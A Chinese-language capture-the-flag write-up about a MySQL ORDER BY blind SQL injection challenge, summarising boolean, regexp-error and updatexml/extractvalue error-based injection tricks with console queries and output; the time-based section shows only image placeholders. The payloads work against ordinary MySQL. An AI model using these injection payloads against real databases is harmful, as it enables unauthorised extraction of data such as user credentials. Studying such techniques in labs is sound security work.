http://game.sycsec.com:2008/Steam/1.php?type=DESC
题目地址,一个order by盲注,这里表名大小写不敏感,如果直接用字符比较做bool条件的话会有错误,如果用ascii的话就不会错误了。

这里禁用了sleep(),应该是防止直接使用sqlmap跑。

简单总结一下order by 注入。

判断返回结果顺序不同

因为order by的值需要为唯一,而select 1 from INFORMATION_SCHEMA.SCHEMATA会返回多个,所以会产生报错。

1
2
3
4
5
6
7
8
mysql> select * from users order by if((1=2),2,(select 1 from INFORMATION_SCHEMA.SCHEMATA));
ERROR 1242 (21000): Subquery returns more than 1 row
mysql> select * from users order by if((1=1),2,(select 1 from INFORMATION_SCHEMA.SCHEMATA));
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |

image
image

regexp

1
2
3
4
5
6
7
8
9
mysql> SELECT * from users order by 1,(select 1 regexp if(1=2,1,0x00));
ERROR 1139 (42000): Got error 'empty (sub)expression' from regexp
mysql> SELECT * from users order by 1,(select 1 regexp if(1=1,1,0x00));
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |

updatexml

1
2
3
4
5
6
7
8
9
updatexml:
mysql> SELECT user,host from mysql.user order by updatexml(1,if(1=1,user(),2),1)
;
ERROR 1105 (HY000): XPATH syntax error: '@localhost'
extractvalue:
mysql> SELECT user,host from mysql.user order by extractvalue(1,if(1=1,user(),2)
);
ERROR 1105 (HY000): XPATH syntax error: '@localhost'

基于时间

image
image